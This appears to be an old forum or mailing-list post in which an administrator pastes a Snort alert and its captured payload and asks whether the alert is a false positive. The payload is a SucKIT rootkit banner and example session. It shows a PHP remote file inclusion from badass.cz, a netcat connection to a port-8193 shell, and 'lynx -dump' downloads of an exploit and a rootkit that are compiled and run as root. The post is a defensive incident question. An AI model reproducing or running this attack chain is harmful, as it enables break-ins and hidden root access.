I came in this moring and checked my snort alerts (morning routine), and noticed the following:<br>
<br>
ATTACK-RESPONSES id check returned root&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; 2005-10-21
07:40:32&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;
<a href="http://82.165.25.125:80">82.165.25.125:80</a>&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp; <a href="http://10.10.10.5:51949">10.10.10.5:51949</a>&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; TCP<br>
<br>
Some background.&nbsp; 10.10.10.x is my dmz and <a href="http://10.10.10.5">10.10.10.5</a> is a
firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our
192.168.0.x internal network.<br>
So I started digging around. The alert logged the following:<br>
<br>
SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit&nbsp; *.* <br>
(c)oded by <a href="mailto:sd@sf.cz">sd@sf.cz</a> &amp;amp; <a href="mailto:devik@cdi.cz">devik@cdi.cz</a>, 2001 <br>
Configuring ./sk:.OK!.[<a href="mailto:attacker@badass.cz">attacker@badass.cz</a> ~/sk10]$ telnet <a href="http://lamehost.com">lamehost.com</a>
80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character
is '^]'..GET /bighole.php3?inc=<a href="http://badass.cz/egg.php3">http://badass.cz/egg.php3</a> HTTP/1.1.Host:
<a href="http://lamehost.com">lamehost.com</a> ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52
GMT.Server: Apache/1.3.14 (Unix)&nbsp; (Red-Hat/Linux)
PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 <a href="http://GMT.ET">GMT.ET</a> ag:
&amp;quot;31c6-c2-3bb3ffba&amp;quot;.Content-Type: text/html..IT WERKS!
Shell at port 8193 Connection closed by foreign
host..[attacker@badass.cz~/sk10]$ nc -v <a href="http://lamehost.com">lamehost.com</a> <a href="http://8193.lamehost.com">8193.lamehost.com</a>
[<a href="http://192.168.0.2">192.168.0.2</a>] 8193 (?) open.w.12:08am up&nbsp; 1:20,&nbsp; 3
users,&nbsp; load average: 0.05, 0.06,0.08.USER&nbsp;&nbsp;&nbsp;&nbsp;
TTY&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; FROM&nbsp;&nbsp;&nbsp;
LOGIN@IDLE&nbsp;&nbsp; JCPU&nbsp;&nbsp; PCPU&nbsp; AT.root&nbsp;&nbsp;
tty1&nbsp;&nbsp;&nbsp;&nbsp; -&nbsp; 11:58pm 39:03&nbsp;&nbsp;
3.15s&nbsp; 2.95s&nbsp; <a href="http://bash.cd">bash.cd</a> /tmp.lynx -dump <a href="http://badass.cz/s.c&amp;gt">http://badass.cz/s.c
&amp;gt</a>; s.c.gcc s.c o
super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root)
gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd
.l33t.lynx -dump <a href="http://badass.cz/~attacker/sk10/s">http://badass.cz/~attacker/sk10/s</a><br>
k &amp;gt; sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w<br>
<br>
Ok, there a few things that make me think that this is a false
positive.&nbsp; First is the &quot;<a href="http://192.160.0.02">192.160.0.02</a>&quot; IP.&nbsp; That is not on
this network.&nbsp; Second, There is no host on <a href="http://192.168.0.2">192.168.0.2</a>.&nbsp;
Third, I do not have any Red Hat machines.&nbsp; They are all
Slackware.&nbsp; I am still concerned.&nbsp; I searched for &quot;sk&quot; and
all I found are two directories related to vim and I didn't find a
directory called &quot;l33t&quot;.<br>
<br>
Can anyone me verify that I wasn't hacked?<br>
<br>
Thanks,<br>
Chris<br>